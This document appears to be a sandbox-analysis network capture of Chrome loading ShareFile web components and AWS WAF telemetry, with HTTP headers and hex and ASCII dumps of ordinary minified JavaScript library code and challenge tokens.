                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC15256INData Raw: 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 72 28 65 29 7d 74 2e 64 28 6e 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 7d 2c 34 30 31 38 31 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28
                                                                                                                                                                                                                      Data Ascii: nction"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}t.d(n,{Z:()=>r})},40181:(e,n,t)=>{"use strict";t.d(
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC1276INData Raw: 20 69 3d 5a 26 26 72 21 3d 3d 76 3f 72 3a 43 3b 6f 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 3f 6f 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 65 2c 66 2c 74 2c 69 2c 4c 2c 6e 29 3a 6f 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 26 26 6f 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d 69 73 73 69 6e 67 26 26 6f 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d 69 73 73 69 6e 67 28 65 2c 66 2c 74 2c 69 2c 4c 2c 6e 29 2c 6f 2e 65 6d 69 74 28 22 6d 69 73 73 69 6e 67 4b 65 79 22 2c 65 2c 66 2c 74 2c 76 29 7d 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65
                                                                                                                                                                                                                      Data Ascii: i=Z&&r!==v?r:C;o.options.missingKeyHandler?o.options.missingKeyHandler(e,f,t,i,L,n):o.backendConnector&&o.backendConnector.saveMissing&&o.backendConnector.saveMissing(e,f,t,i,L,n),o.emit("missingKey",e,f,t,v)};this.options.saveMissing&&(this.options.save


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      91192.168.2.174981013.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC574OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4b3bed207ec72204ebc89ae818e573ee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: bRYtkSioNt6PRogb4GLfW0EL7tHleCWWFpnNMBzOKoF_4EkHUOfKBA==
                                                                                                                                                                                                                      Age: 31253
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      92192.168.2.174981218.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC653OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 1878
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC1878OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 64 4d 79 49 78 37 76 48 41 41 41 41 3a 38 34 5a 44 6b 69 51 77 64 4e 50 46 4e 69 50 2f 67 6f 63 76 50 59 43 54 68 76 55 4a 56 77 57 41 68 46 55 64 51 39 65 33 30 53 36 37 58 42 72 62 64 35 50 38 45 66 38 56 4b 44 72 39 38 58 42 55 78 6f 79 68 64 69 45 75 2b 38 73 52 71 79 53 2f 43 59 53 30 4f 50 58 78 41 45 35 36 76 52 30 63 6b 61 50 6c 31 44 63 64 34 33 4a 6e 6a 31 4d 41 72 78 41 4f 6b 49 6e 49 44 4f 35 43 73 43 4d 4f 36 6b 71 6a 75 45 42 74 66 31 5a 53 65 4c 62 4f 47 74 4b 63 77 4b 35 73 7a 6c 38 6d 66 4f 41 71 67 64 5a 69 59 4d 54 62 54 69 44 6f 2f 76 77 36 74 74 41 4e 68 6d
                                                                                                                                                                                                                      Data Ascii: {"existing_token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAdMyIx7vHAAAA:84ZDkiQwdNPFNiP/gocvPYCThvUJVwWAhFUdQ9e30S67XBrbd5P8Ef8VKDr98XBUxoyhdiEu+8sRqyS/CYS0OPXxAE56vR0ckaPl1Dcd43Jnj1MArxAOkInIDO5CsCMO6kqjuEBtf1ZSeLbOGtKcwK5szl8mfOAqgdZiYMTbTiDo/vw6ttANhm
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 948
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:16 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73b0-395726de560cc2d430046937
                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                      cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 45f8047ab98fa87807d2f5362a7fb75c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: 5B6XTOX1R0thQvfvq5-1pm4jm_V0ugojwPgpsmUFqH1k1H9UKhh2jA==
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC948INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 6a 6f 79 49 74 2b 6e 57 41 41 41 41 3a 51 4a 70 38 62 4d 41 6c 6a 71 63 79 2f 78 65 4b 71 73 74 2f 6f 51 6c 75 49 4f 50 64 4a 4c 39 62 51 4c 38 44 4e 57 44 45 35 6c 6d 42 71 64 50 68 5a 34 51 62 36 73 4d 6b 50 37 2b 6c 45 64 33 49 73 59 77 44 39 79 6a 31 51 2b 6f 6c 47 47 30 69 2b 4e 45 4b 66 76 49 74 73 64 44 6d 74 46 52 2b 6c 46 7a 77 68 6c 6d 77 6c 76 56 53 33 47 43 67 43 2b 4b 76 75 73 51 49 37 6c 57 69 42 78 42 6e 65 38 31 72 38 42 46 48 74 47 43 41 39 53 4f 6d 61 52 37 38 56 37 35 75 73 6f 45 52 6c 2f 5a 44 73 59 41 53 4a 58 2f 50 39 56 58 6c 67 61 54 74 71 72 38 55 48 54 7a 53 4c 31 68 4c 78 76 54
                                                                                                                                                                                                                      Data Ascii: {"token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAjoyIt+nWAAAA:QJp8bMAljqcy/xeKqst/oQluIOPdJL9bQL8DNWDE5lmBqdPhZ4Qb6sMkP7+lEd3IsYwD9yj1Q+olGG0i+NEKfvItsdDmtFR+lFzwhlmwlvVS3GCgC+KvusQI7lWiBxBne81r8BFHtGCA9SOmaR78V75usoERl/ZDsYASJX/P9VXlgaTtqr8UHTzSL1hLxvT


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      93192.168.2.174981313.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC421OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 172013
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "1b4bef66080aa287b1d9e5454fb07741"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5a5b94c62ea85e0c0d78b169589b08b4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: Tnt_eYIpXJB5yQ4ekzxTIRGJ-p4CC_ZKxJ0krRaKzq_MMxMBpz-pTw==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6e 61 6e 74 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{})System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e)
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 74 69 6f 6e 54 6f 6b 65 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 69 6c 65 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 46 6f 6c 64 65 72 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 52 65 64 69 72 65 63 74 69 6f 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: tionToken"===e["odata.type"]}function i(e){return e&&"ShareFile.Api.Models.File"===e["odata.type"]}function a(e){return e&&"ShareFile.Api.Models.Folder"===e["odata.type"]}function s(e){return e&&"ShareFile.Api.Models.Redirection"===e["odata.type"]}functio
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 34 38 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 3f 7b 77 72 69 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 3d 5b 5d 3b 73 2e 70 75 73 68 28 65 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 2c 6e 2e 69 73 4e 75 6d 62 65 72 28 72 29 26 26 73 2e 70 75 73 68 28 22 65 78 70 69 72 65 73 3d 22 2b 6e 65 77 20 44 61 74 65 28 72 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 6f 29 26 26 73 2e 70 75 73 68 28 22 70 61 74 68 3d 22 2b 6f 29 2c 6e 2e 69 73 53 74 72 69 6e 67 28 69 29 26 26 73 2e 70 75 73 68 28
                                                                                                                                                                                                                      Data Ascii: )=>{"use strict";var n=r(4867);e.exports=n.isStandardBrowserEnv()?{write:function(e,t,r,o,i,a){var s=[];s.push(e+"="+encodeURIComponent(t)),n.isNumber(r)&&s.push("expires="+new Date(r).toGMTString()),n.isString(o)&&s.push("path="+o),n.isString(i)&&s.push(
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC14808INData Raw: 72 6e 6f 76 74 73 79 20 63 6b 20 63 6e 20 63 6f 20 63 6f 6d 20 63 72 69 6d 65 61 20 63 76 20 64 6e 20 64 6e 65 70 72 6f 70 65 74 72 6f 76 73 6b 20 64 6f 6e 65 74 73 6b 20 64 70 20 65 64 75 20 67 6f 76 20 69 66 20 69 6e 20 69 76 61 6e 6f 2d 66 72 61 6e 6b 69 76 73 6b 20 6b 68 20 6b 68 61 72 6b 6f 76 20 6b 68 65 72 73 6f 6e 20 6b 68 6d 65 6c 6e 69 74 73 6b 69 79 20 6b 69 65 76 20 6b 69 72 6f 76 6f 67 72 61 64 20 6b 6d 20 6b 72 20 6b 73 20 6b 76 20 6c 67 20 6c 75 67 61 6e 73 6b 20 6c 75 74 73 6b 20 6c 76 69 76 20 6d 65 20 6d 6b 20 6e 65 74 20 6e 69 6b 6f 6c 61 65 76 20 6f 64 20 6f 64 65 73 73 61 20 6f 72 67 20 70 6c 20 70 6f 6c 74 61 76 61 20 70 70 20 72 6f 76 6e 6f 20 72 76 20 73 65 62 61 73 74 6f 70 6f 6c 20 73 75 6d 79 20 74 65 20 74 65 72 6e 6f 70 69 6c
                                                                                                                                                                                                                      Data Ascii: rnovtsy ck cn co com crimea cv dn dnepropetrovsk donetsk dp edu gov if in ivano-frankivsk kh kharkov kherson khmelnitskiy kiev kirovograd km kr ks kv lg lugansk lutsk lviv me mk net nikolaev od odessa org pl poltava pp rovno rv sebastopol sumy te ternopil
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC445INData Raw: 6c 2c 64 3d 6c 2b 68 2e 6c 65 6e 67 74 68 2c 65 29 3b 76 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 28 76 3d 53 74 72 69 6e 67 28 76 29 2c 65 3d 65 2e 73 6c 69 63 65 28 30 2c 6c 29 2b 76 2b 65 2e 73 6c 69 63 65 28 64 29 2c 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 6c 2b 76 2e 6c 65 6e 67 74 68 29 3a 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 64 7d 7d 72 65 74 75 72 6e 20 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 65 7d 2c 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 48 6f 73 74 6e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3d 21 21 74 2c 6f 3d 21 31 3b 69 66 28 21 21 72 26 26 28 6f 3d 68 28 69 2e 68 6f 73 74 50 72 6f 74 6f 63 6f 6c 73 2c 72 29 29 2c 6f 26 26 21 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 48 6f 73 74 6e 61 6d 65
                                                                                                                                                                                                                      Data Ascii: l,d=l+h.length,e);v!==undefined?(v=String(v),e=e.slice(0,l)+v+e.slice(d),n.lastIndex=l+v.length):n.lastIndex=d}}return n.lastIndex=0,e},i.ensureValidHostname=function(t,r){var n=!!t,o=!1;if(!!r&&(o=h(i.hostProtocols,r)),o&&!n)throw new TypeError("Hostname
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 27 29 3b 69 66 28 65 2e 74 6f 41 53 43 49 49 28 74 29 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 48 6f 73 74 6e 61 6d 65 20 22 27 2b 74 2b 27 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 3a 5f 5d 27 29 7d 7d 2c 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 50 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 74 3d 4e 75 6d 62 65 72 28 65 29 3b 69 66 28 21 28 2f 5e 5b 30 2d 39 5d 2b 24 2f 2e 74 65 73 74 28 74 29 26 26 74 3e 30 26 26 74 3c 36 35 35 33 36 29 29 74 68 72 6f 77 20 6e 65
                                                                                                                                                                                                                      Data Ascii: not available');if(e.toASCII(t).match(i.invalid_hostname_characters))throw new TypeError('Hostname "'+t+'" contains characters other than [A-Z0-9.-:_]')}},i.ensureValidPort=function(e){if(e){var t=Number(e);if(!(/^[0-9]+$/.test(t)&&t>0&&t<65536))throw ne
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 2e 62 75 69 6c 64 28 29 7d 2c 61 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 6f 2c 61 2c 63 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2c 75 3d 6e 65 77 20 69 28 65 29 2c 66 3d 7b 7d 3b 69 66 28 63 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 75 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 3d 63 2e 71 75 65 72 79 28 29 2c 6f 3d 75 2e 71 75 65 72 79 28 29 2c 63 2e 71 75 65 72 79 28 22 22 29 2c 75 2e 71 75 65 72 79 28 22 22 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 21 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 21 3d 3d 6f 2e 6c 65 6e 67 74 68 29
                                                                                                                                                                                                                      Data Ascii: .build()},a.equals=function(e){var t,r,n,o,a,c=this.clone(),u=new i(e),f={};if(c.normalize(),u.normalize(),c.toString()===u.toString())return!0;if(n=c.query(),o=u.query(),c.query(""),u.query(""),c.toString()!==u.toString())return!1;if(n.length!==o.length)
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 72 29 7d 29 29 3b 76 61 72 20 6e 3d 7b 7d 3b 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 74 79 6c 65 5b 22 2e 63 6f 6e 63 61 74 28 5a 2c 22 5d 22 29 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 2c 6f 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5a 29 3b 6e 5b 6f 5d 3f 74 5b 4a 5d 3d 3d 3d 65 26 26 28 6e 75 6c 6c 3d 3d 3d 28 72 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 29 3a 6e 5b 6f 5d 3d 21 30 7d 29 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 58 28 65 29 7d 76 61 72 20 4b 3d 6f 2e 63 72 65 61 74 65 43 6f 6e
                                                                                                                                                                                                                      Data Ascii: .insertBefore(t,r)}));var n={};Array.from(document.querySelectorAll("style[".concat(Z,"]"))).forEach((function(t){var r,o=t.getAttribute(Z);n[o]?t[J]===e&&(null===(r=t.parentNode)||void 0===r||r.removeChild(t)):n[o]=!0}))}return new X(e)}var K=o.createCon
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC14808INData Raw: 72 69 62 75 74 65 28 47 2c 4f 29 2c 75 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7a 28 45 74 28 6f 5b 65 5d 29 2c 22 5f 65 66 66 65 63 74 2d 22 2e 63 6f 6e 63 61 74 28 65 29 2c 69 29 7d 29 29 7d 7d 29 29 2c 52 3d 6d 28 45 2c 33 29 2c 54 3d 52 5b 30 5d 2c 4d 3d 52 5b 31 5d 2c 49 3d 52 5b 32 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 74 3d 78 26 26 21 6a 26 26 70 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 2c 50 65 28 7b 7d 2c 64 28 64 28 7b 7d 2c 47 2c 4d 29 2c 5a 2c 49 29 2c 7b 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 3a 7b 5f 5f 68 74 6d 6c 3a 54 7d 7d 29 29 3a 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 50 74 2c
                                                                                                                                                                                                                      Data Ascii: ribute(G,O),u.forEach((function(e){z(Et(o[e]),"_effect-".concat(e),i)}))}})),R=m(E,3),T=R[0],M=R[1],I=R[2];return function(e){var t;return t=x&&!j&&p?o.createElement("style",Pe({},d(d({},G,M),Z,I),{dangerouslySetInnerHTML:{__html:T}})):o.createElement(Pt,
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC1576INData Raw: 6e 20 74 68 69 73 2e 61 3d 58 74 28 65 29 2c 74 68 69 73 2e 72 6f 75 6e 64 41 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 74 68 69 73 2e 61 29 2f 31 30 30 2c 74 68 69 73 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 4d 6f 6e 6f 63 68 72 6f 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 68 69 73 2e 74 6f 48 73 6c 28 29 2e 73 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 48 73 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 4b 74 28 74 68 69 73 2e 72 2c 74 68 69 73 2e 67 2c 74 68 69 73 2e 62 29 3b 72 65 74 75 72 6e 7b 68 3a 33 36 30 2a 65 2e 68 2c 73 3a 65 2e 73 2c 76 3a 65 2e 76 2c 61 3a 74 68 69 73 2e 61 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 48 73 76 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: n this.a=Xt(e),this.roundA=Math.round(100*this.a)/100,this},e.prototype.isMonochrome=function(){return 0===this.toHsl().s},e.prototype.toHsv=function(){var e=Kt(this.r,this.g,this.b);return{h:360*e.h,s:e.s,v:e.v,a:this.a}},e.prototype.toHsvString=function


